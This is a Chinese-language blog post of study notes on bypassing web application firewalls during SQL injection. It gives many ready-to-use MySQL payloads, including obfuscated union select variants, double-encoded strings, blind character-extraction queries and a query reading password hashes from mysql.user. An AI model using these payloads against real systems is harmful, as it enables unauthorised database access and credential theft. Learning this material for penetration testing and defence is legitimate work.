<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>SQL注入绕过的学习 | Maxenton</title><meta name="author" content="Maxenton"><meta name="copyright" content="Maxenton"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="SQL注入绕过-学习记录。">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入绕过的学习">
<meta property="og:url" content="https://threeshui.github.io/2022/06/11/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/index.html">
<meta property="og:site_name" content="Maxenton">
<meta property="og:description" content="SQL注入绕过-学习记录。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://threeshui.github.io/img/sqlraoguo.jpeg">
<meta property="article:published_time" content="2022-06-10T16:00:00.000Z">
<meta property="article:modified_time" content="2022-11-14T11:19:03.747Z">
<meta property="article:author" content="Maxenton">
<meta property="article:tag" content="信息安全">
<meta property="article:tag" content="漏洞学习">
<meta property="article:tag" content="SQL注入绕过">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://threeshui.github.io/img/sqlraoguo.jpeg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://threeshui.github.io/2022/06/11/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//hm.baidu.com"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?2ec9fa90a95a4d6f2c1057f31b412d4a";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":false,"languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: {"limitCount":50,"languages":{"author":"作者: Maxenton","link":"链接: ","source":"来源: Maxenton","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。"}},
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'SQL注入绕过的学习',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-11-14 19:19:03'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><link rel="stylesheet" href="/css/custom/custom.css"><script src="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script><meta name="generator" content="Hexo 6.3.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/head.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">75</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">38</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">38</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/img/sqlraoguo.jpeg')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Maxenton</a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">SQL注入绕过的学习</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-06-10T16:00:00.000Z" title="发表于 2022-06-11 00:00:00">2022-06-11</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-11-14T11:19:03.747Z" title="更新于 2022-11-14 19:19:03">2022-11-14</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">漏洞学习</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/SQL%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/">SQL注入绕过</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">3.7k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>14分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="SQL注入绕过的学习"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="一、SQL注入绕过介绍"><a href="#一、SQL注入绕过介绍" class="headerlink" title="一、SQL注入绕过介绍"></a>一、SQL注入绕过介绍</h1><p>SQL注入绕过技术已经是一个老生常淡的内容了，防注入可以使用某些云waf加速乐等安全产品，这些产品会自带waf属性拦截和抵御SQL注入，也有一些产品会在服务器里安装软件，例如iis安全狗、d盾、还有就是在程序理论对输入参数进行过滤和拦截，例如360webscan脚本等只要参数传入的时候就会进行检测，检测到有危害语句就会拦截。<br>SQL注入绕过的技术也有很多，但是在日渐成熟的waf产品面前，因为waf产品的规则越来越完善，所以防御就会越来越高，安全系统也跟着提高，对渗透测试而言，测试的难度就会越来越高。<br>#		二、常见的注入绕过方法<br>##		1、空格字符绕过<br>两个空格代替一个空格，用Tab代替空格，%a0&#x3D;空格。<br><img src="https://img-blog.csdnimg.cn/97a675c5c0584287bc3eda42798b2bad.png" alt="在这里插入图片描述"><br>&#x3D;&#x3D;使用URL编码的方式必须要在有中间件的网站上使用，直接使用sql语句进行查询是没办法解析的。&#x3D;&#x3D;<br>可以将空格字符替换成注释&#x2F;<strong>&#x2F;，也可以使用内联注释，&#x2F;<em>!code</em>&#x2F;（关于内联注释请观看mysql文章）。<br>##		2、大小写绕过<br>将字符串设置为大小写，例如and1&#x3D;1转成AND1&#x3D;1或者AnD 1&#x3D;1；<br>&#x3D;&#x3D;mysql默认是不区分大小写的。&#x3D;&#x3D;<br>##		3、浮点数绕过注入<br>可以在查询语句where条件这里使用，select * from users where id&#x3D;1e0或者id&#x3D;1.1。<br>##		4、NULL值绕过<br>在查询语句where条件这里使用，select * from users where id&#x3D;\N。<br>##		5、引号绕过<br>如果waf拦截过滤单引号的时候，可以使用双引号在mysql里也可以用双引号作为字符。<br>比如select * from users where id&#x3D;‘1’。<br>select * from users where id&#x3D;“1”。<br>也可以将字符串转成16进制再进行查询。select hex（‘admin’） 已经select 0X61646D696E。<br>&#x3D;&#x3D;如果gpc开启了，但是注入点是整型，也可以用hex十六进制进行绕过。&#x3D;&#x3D;<br>##		6、添加库名绕过<br>有些waf的拦截规则并不会拦截包含库名.表名这种模式。<br>比如 select * from users where id &#x3D; -1 union select 1,2,3 from security.users;<br>&#x3D;&#x3D;mysql中也可以添加库名查询表，例如跨库查询mysql库里的users表的内容。&#x3D;&#x3D;<br>select * from users where id &#x3D;-1 union select 1,2,concat(user,authentication_string) from mysql.user<br>##		7、去重复绕过<br>在mysql查询可以使用distinct关键词去除查询的重复值，可以利用这点突破waf拦截。<br>select * from users where id&#x3D;-1 union distinct select 1,2,version() from users<br>##		8、反引号绕过<br>在mysql可以使用</strong>这里是反引号**绕过一些waf拦截，字段可以加反引号或者不加，意义相同。<br>&#x3D;&#x3D;反引号前面不加空格也是可以的。&#x3D;&#x3D;<br>##		9、脚本语言特性绕过<br>在 php 语言中 id&#x3D;1&amp;id&#x3D;2 后面的值会自动覆盖前面的值，不同的语言有不同的特性。可以利用这点绕过一些 waf 的拦截；<br>id&#x3D;1%00&amp;id&#x3D;2 union select 1,2,3 有些 waf 会去匹配第一个 id 参数 1%00 ，%00 是截断字符，waf 会自动截断，从而，不会检测后面的内容，到了程序中 id 就是等于 id&#x3D;2 union select 1,2,3 从绕过注入拦截；<br>name&#x3D;%00name&#x3D;’ union select 1,(select version() from users limit 1)–+<br>其他语言特性：<img src="https://img-blog.csdnimg.cn/2c4e8fe5ab5f4fec8cfc1b1740662c46.png" alt="在这里插入图片描述"><br>##		10、逗号绕过<br>目前有些防注入脚本都会对逗号进行拦截，例如常规注入中必须包含逗号；<br>select * from users where id&#x3D;1 union select 1,2,3;<br>&#x3D;&#x3D;不用逗号是指定不行的。&#x3D;&#x3D;<br>##		11、substr截取字符串<br>select(substr(database() from 1 for 1));<br>查询当前库第一个字符；<br> 查询 s 等于 select(substr(database() from 1 for 1));页面返回正常；<br> 同样我们也可以一个一个字符往后查</p>
<h2 id="12、mid截取字符串"><a href="#12、mid截取字符串" class="headerlink" title="12、mid截取字符串"></a>12、mid截取字符串</h2><p>mid() 函数跟 substr() 函数功能相同,如果 substr() 函数被拦截或者过滤可以使用这个函数代替 ；<br>select mid(database() from 1 for 1);  # 方法如上；<br>select * from users where id&#x3D;1 and ‘s’&#x3D;(select(mid(database() from 1 for 1)));<br>select * from users where id&#x3D;1 and 0x73&#x3D;(select(mid(database() from 1 for 1)));<br>name&#x3D;vince’ and (select(mid(database() from 1 for 1)))&#x3D;’p’–+<br>name&#x3D;1’ or (select(mid(database() from 1 for 1)))&#x3D;’p’–+<br>##		13、使用join绕过<br>使用 join 自连接两个表 ;<br>union select 1,2  #等价于  union select * from (select 1)a join (select 2)b<br>#a 和 b 分别是表的别名；<br>select * from users where id&#x3D;-1 union select 1,2,3;  # 可以变成下面的语句；<br>   select * from users where id&#x3D;-1 union select * from (select 1)a join (select 2)b join(select 3)c;<br>   select * from users where id&#x3D;-1 union select * from (select 1)a join (select 2)b join(select user())c;<br>##		14、like绕过<br>使用 like 模糊查询 select user() like ‘%r%’; 模糊查询成功返回 1 否则返回 0 ；<br> 找到第一个字符后继续进行下一个字符匹配，从而找到所有的字符串，最后就是要查询的内容，这种 SQL 注入语句也不会存在逗号，从而绕过 waf 拦截；<br>select * from users where id&#x3D;1 and (select user() like ‘%r%’);<br>select * from users where id&#x3D;-1 union select 1,2,user() like ‘%root%’ limit 1;<br>##		15、limit offset绕过<br>SQL 注入时，如果需要限定条目可以使用 limit 0,1 限定返回条目的数目 limit 0,1 返回一条记录，如果对逗号进行拦截时，可以使用 limit 1 默认返回第一条数据；也可以使用 limit 1 offset 0 从零开始返回第一条记录，这样就绕过 waf 拦截了。<br>##		16、or和xor not绕过。<br>目前主流的 waf 都会对：<br>•<br>• id&#x3D;1 and 1&#x3D;2、<br> id&#x3D;1 or 1&#x3D;2、<br>id&#x3D;0 or 1&#x3D;2<br>id&#x3D;0 xor 1&#x3D;1 limit 1 、<br>id&#x3D;1 xor 1&#x3D; 2</p>
<p>对这些常见的 SQL 注入检测语句进行拦截，像 and 这些还有字符代替；<br>字符如下：<br>• and 等于&amp;&amp;<br>• or 等于 ||<br>• not 等于 !<br>• xor 等于<br>所以可以转换成这样：<br>•<br>• id&#x3D;1 and 1&#x3D;1 等于 id&#x3D;1 &amp;&amp; 1&#x3D;1<br>• id&#x3D;1 and 1&#x3D;2 等于 id&#x3D;1 &amp;&amp; 1&#x3D;2<br>• id&#x3D;1 or 1&#x3D;1 等于 id&#x3D;1 || 1&#x3D;1<br>• id&#x3D;0 or 1&#x3D;0 等于 id&#x3D;0 ||  1&#x3D;0<br>• in<br>•<br>• in运算符用来判断表达式的值是否位于给出的列表中；如果是，返回值为 1，否则返回值为 0；<br>•<br>• not in<br>•<br>• NOT IN 用来判断表达式的值是否不存在于给出的列表中；如果不是，返回值为 1，否则返回值为 0；<br>&#x3D;&#x3D;注意：在url使用逻辑运算符的时候要url编码；&#x3D;&#x3D;</p>
<h2 id="17、ascii字符对比绕过"><a href="#17、ascii字符对比绕过" class="headerlink" title="17、ascii字符对比绕过"></a>17、ascii字符对比绕过</h2><p>许多 waf 会对 union select 进行拦截，而且通常比较变态，那么可以不使用联合查询注入，可以使用字符截取对比法，进行突破；<br>select substring(user(),1,1); </p>
<h1 id="返回第一位"><a href="#返回第一位" class="headerlink" title="返回第一位"></a>返回第一位</h1><p>select * from users where id&#x3D;1 and substring(user(),1,1)&#x3D;’r’;</p>
<h1 id="字符匹配第一位"><a href="#字符匹配第一位" class="headerlink" title="字符匹配第一位"></a>字符匹配第一位</h1><p>select * from users where id&#x3D;1 and ascii(substring(user(),1,1))&#x3D;114;</p>
<h1 id="ascii码匹配"><a href="#ascii码匹配" class="headerlink" title="ascii码匹配"></a>ascii码匹配</h1><p>最好把’r’换成成 ascii 码，如果开启 gpc int 整形注入就不能用了 ；<br>  我们可以看到不使用联合查询(union select)也可以把数据查询出来 ；<br>##		18、等号绕过<br>如果程序会对&#x3D;进行拦截 ，可以使用 like rlike regexp 或者使用 &lt; 或者 &gt;<br>select * from users where id&#x3D;1 and ascii(substring(user(),1,1))&lt;115;<br>select * from users where id&#x3D;1 and ascii(substring(user(),1,1))&gt;115;<br>##		19、双关键词绕过<br>有些程序会对单词 union、 select 进行转空 但是只会转一次这样会留下安全隐患；<br>双关键字绕过（若删除掉第一个匹配的 union 就能绕过）：<br>id&#x3D;-1’UNIunionONSeLselectECT 1,2,3–+<br>到数据库里执行会变成：<br>id&#x3D;-1’UNION SeLECT 1,2,3–+<br>从而绕过注入拦截；<br>这种方式也是需要程序配合的，如果有安全防护，可以试试；<br>##		20、二次编码绕过<br>有些程序会解析二次编码，造成 SQL 注入，因为 url 两次编码过后，waf 是不会拦截的；<br>-1 union select 1,2,3,4#<br>第一次转码：<br>%2d%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%23<br>第二次转码：<br>%25%32%64%25%33%31%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%33%33%25%32%63%25%33%34%25%32%33<br>•  注意：中间件只会进行一次解码，不会解析两次url编码的，两次编码 waf 是不会拦截的；<br>• 一般二次编码都是中间件进行了一次解码，然后程序内又进行了一次，才会解析，程序内一般用的都是函数urldecode函数；<br>• 所以，不管是开了gpc或者waf都是可以绕过的，而且不会拦截； </p>
<h2 id="21、使用生僻函数绕过"><a href="#21、使用生僻函数绕过" class="headerlink" title="21、使用生僻函数绕过"></a>21、使用生僻函数绕过</h2><p>使用生僻函数替代常见的函数，例如在报错注入中使用 polygon()函数替换常用的 updatexml()函数 ；<br>select polygon((select * from (select * from (select @@version) f) x));<br>空间函数，要求版本的；<br>• 报错注入函数参考： <a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_46706771/article/details/112770568">https://blog.csdn.net/weixin_46706771/article/details/112770568</a><br>##		22、分块传输绕过<br><img src="https://img-blog.csdnimg.cn/2a733a5ae666482b9bc78cc5af03527e.png" alt="在这里插入图片描述"><br>##		23、信任白名单绕过<br><img src="https://img-blog.csdnimg.cn/c415d4d7c894462db9f0c3ff6b19cc1f.png" alt="在这里插入图片描述"><br>##		24、静态文件绕过<br><img src="https://img-blog.csdnimg.cn/d715677260a24c46886b44dbcbe136ed.png" alt="在这里插入图片描述"><br>##		25、pipline绕过注入<br> http 协议是由 tcp 协议封装而来，当浏览器发起一个 http 请求时，浏览器先和服务器建立起连接 tcp 连接，然后发送 http 数据包（即我们用 burpsuite 截获的数据）， 其中包含了一个 Connection 字段，一般值为 close，apache 等容器根据这个字段决定是保持该 tcp 连接或是断开。当发送的内容太大，超过一个 http 包容量，需要分多次发送时，值会变成 keep-alive，即本次发起的 http 请求所建立的 tcp 连接不断开，直到所发送内容结束 Connection 为 close 为止。<br>##		26、利用multipart&#x2F;form-data绕过<br><img src="https://img-blog.csdnimg.cn/c66248c3a89b4cba8f81a2820c649ef6.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/8e70af939b8d4cfb9eabb8379a5faf80.png" alt="在这里插入图片描述"><br> 还有一种方法，逻辑性的方法，通过上传一张图片绕过，因为一些waf在匹配到一个图片的包参数时，就不会接着往下继续匹配其他的参数，从而进行绕过；<br>上面的from表单内加入以下代码：<br>    <input type="file" name="file"><br><img src="https://img-blog.csdnimg.cn/46f85155064e4d5f90660bbf8c577a8b.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/2104842e6d9c4c7ba886c3fd4d0419c7.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/a5ebfa0645df4b2ab050efe6f05f5003.png" alt="在这里插入图片描述"><br>##		27、order by绕过<br><img src="https://img-blog.csdnimg.cn/c990d510d7784ce39fd5794e12a78319.png" alt="在这里插入图片描述"><br>##		28、运行大量字符绕过<br><img src="https://img-blog.csdnimg.cn/921ae439280b40a2b870ac7fb678f912.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/d5f7bc15174048228d6d7139947a4600.png" alt="在这里插入图片描述"><br>id&#x3D;1 and (select 1)&#x3D;(select 0xA*1000)union select 1,user()–+</p>
<h1 id="可以直接乘1000个，系统会执行；"><a href="#可以直接乘1000个，系统会执行；" class="headerlink" title="可以直接乘1000个，系统会执行；"></a>可以直接乘1000个，系统会执行；</h1><h1 id="可以ctrl-u做一下url编码；"><a href="#可以ctrl-u做一下url编码；" class="headerlink" title="可以ctrl+u做一下url编码；"></a>可以ctrl+u做一下url编码；</h1><p><img src="https://img-blog.csdnimg.cn/3b1e3a4bd0d545b49f12f013a45aa843.png" alt="在这里插入图片描述"><br>id&#x3D;1+and+(select+1)and+(select+0xA<em>1000)&#x2F;</em>!union*&#x2F;&#x2F;<em>!select</em>&#x2F;+1,user()–+<br><img src="https://img-blog.csdnimg.cn/bb4c299b933b422489d78e86844a2032.png" alt="在这里插入图片描述"><br>##		29、花括号绕过<br>花括号，左边是注释的内容，这样可以绕一些 waf 的拦截；<br>select 1,2 union select{x 1},user()<br>    花括号内的x可以为任意字符串，不能是数字，相当于注释的意思<br>select * from users where id&#x3D;1 union select{xxx 1},{xxx 2},{xxx 3},user();<br>##		30、使用ALL或者DISTINCT绕过<br><img src="https://img-blog.csdnimg.cn/cb625b7df67e4ced95d58451f5ec36c4.png" alt="在这里插入图片描述"><br>##		31、换行混绕绕过<br>目前很多 waf 都会对 union select 进行过滤的，因为使用联合查询这两个关键词是必须的，一般过滤这个两个字符，想用联合查询就很难了；<br>可以使用换行加上一些注释符进行绕过；<br><img src="https://img-blog.csdnimg.cn/5209c2b81a2d462eaa0f8b63fb7c61d4.png" alt="在这里插入图片描述"><br>##		32、编码绕过<br>原理：<br> 形式：”%” 加上 ASCII 码（先将字符转换为 ASCII 码，再转为 16 进 制），其中加号 “+” 在 URL 编码中和 “%20” 表示一样，均为空格；<br> 当遇到非 ASCII 码表示的字符时，如中文，浏览器或通过编写 URLEncode，根据 UTF-8、GBK 等编码 16 进制形式，进行转换，如“春”的 UTF-8 编码为 E6 98 A5，因此其在支持 UTF-8 的情况下，URL 编码为%E6%98%A5。值得注意的是，采取不同的中文编码，会有不同的 URL 编码；<br> 在 URL 传递到后台时，首先 web 容器会自动先对 URL 进行解析，容器解码时会根据设置（如 jsp 中，会使用 request.setCharacterEncoding(“UTF-8”)），采用 UTF-8 或 GBK 等其中一种编码进行解析，这时，程序无需自己再次解码，便可以获取参数（如使用 request.getParameter(paramName)<br>但是，有时从客户端提交的 URL 无法确定是何种编码，如果服务器选择的编码方式不匹配，则会造成中文乱码，为了解决这个问题，便出现了二次 URLEncode 的方法 。 在客户端对 URL 进行两次 URLEncode ， 这样类似上面提到的%E6%98%A5 则会编码为%25e6%2598%25a5，为纯 ASCII 码。Web 容器在接到 URL 后，自动解析一次，因为不管容器使用何种编码进行解析，都支持 ASCII 码，不会出错。然后在通过编写程序对容器解析后的参数进行解码，便可正确得到参数。在这里，客户端的第一次编码，以及服务端的第二次解码，均是由程序员自己设定的，是可控的，可知的；</p>
<h2 id="33、HTTP数据编码绕过"><a href="#33、HTTP数据编码绕过" class="headerlink" title="33、HTTP数据编码绕过"></a>33、HTTP数据编码绕过</h2><p><img src="https://img-blog.csdnimg.cn/31eec5b618af4af69c876a255dfdfac8.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/4b1d6487e26645ecaaba7b79b17e676b.png" alt="在这里插入图片描述"><br>##		34、Unicode编码绕过<br><img src="https://img-blog.csdnimg.cn/d1b2bb18a4f64012bace3de3175a7417.png" alt="在这里插入图片描述"><br>##		35、union select绕过<br>目前不少 waf 都会使用都会对 union select 进行拦截，单个不拦截 ，一起就进行拦截；<br>针对单个关键词绕过：<br>sel&lt;&gt;ect      程序过滤&lt;&gt;为空 脚本处理<br>sele&#x2F;<strong>&#x2F;ct      程序过滤&#x2F;</strong>&#x2F;为空<br>&#x2F;<em>!%53eLEct</em>&#x2F;      url编码与内联注释<br>se%0blect           使用空格绕过<br>sele%ct               使用百分号绕过<br>%53eLEct            编码绕过<br>大小写 ：<br>uNIoN sELecT 1,2<br>union all select 1,2<br>union DISTINCT select 1,2<br>null+UNION+SELECT+1,2<br>&#x2F;<em>!union</em>&#x2F;&#x2F;<em>!select</em>&#x2F;1,2<br>union&#x2F;<strong>&#x2F;select&#x2F;</strong>&#x2F;1,2<br>and(select 1)&#x3D;(Select 0xA<em>1000)&#x2F;</em>!uNIOn*&#x2F;&#x2F;<em>!SeLECt</em>&#x2F; 1,user()<br>&#x2F;<em>!50000union</em>&#x2F;&#x2F;<em>!50000select</em>&#x2F;1,2<br>&#x2F;<em>!40000union</em>&#x2F;&#x2F;<em>!40000select</em>&#x2F;1,2<br>%0aunion%0aselect 1,2<br>%250aunion%250aselect 1,2<br>%09union%09select 1,2<br>%0caunion%0cselect 1,2<br>%0daunion%0dselect 1,2<br>%0baunion%0bselect 1,2<br>%0d%0aunion%0d%0aselect 1,2<br>–+%0d%0aunion–+%0d%0aselect–+%0d%0a1,–+%0d%0a2<br>&#x2F;<em>!12345union</em>&#x2F;&#x2F;<em>!12345select</em>&#x2F;1,2;<br>&#x2F;<em>中文</em>&#x2F;union&#x2F;<em>中文</em>&#x2F;select&#x2F;<em>中文</em>&#x2F;1,2;<br>&#x2F;<em>输入法表情 <em>&#x2F;union&#x2F;</em> 输入法表情</em>&#x2F;select&#x2F;* 输入法表情 <em>&#x2F;1,2;<br>&#x2F;</em>!union*&#x2F;&#x2F;<em>!00000all</em>&#x2F;&#x2F;<em>!00000select</em>&#x2F;1,2<br>#		三、总结与小计<br>虽然SQL注入绕过方式有很多，但是我们的大脑是活动的，是思考的，要去思考如何去工作，建立理论，付出实践，才能得到结果，有问题的地方请指出，万分感谢。</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://threeshui.github.io">Maxenton</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://threeshui.github.io/2022/06/11/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/">https://threeshui.github.io/2022/06/11/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://threeshui.github.io" target="_blank">Maxenton</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a><a class="post-meta__tags" href="/tags/%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">漏洞学习</a><a class="post-meta__tags" href="/tags/SQL%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/">SQL注入绕过</a></div><div class="post_share"><div class="social-share" data-image="/img/sqlraoguo.jpeg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/06/15/Python%E5%AD%A6%E4%B9%A0%E6%97%A5%E8%AE%B0%EF%BC%88%E5%8D%81%E4%BA%8C%EF%BC%89/"><img class="prev-cover" src="/img/python_img.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">Python学习日记（十二）</div></div></a></div><div class="next-post 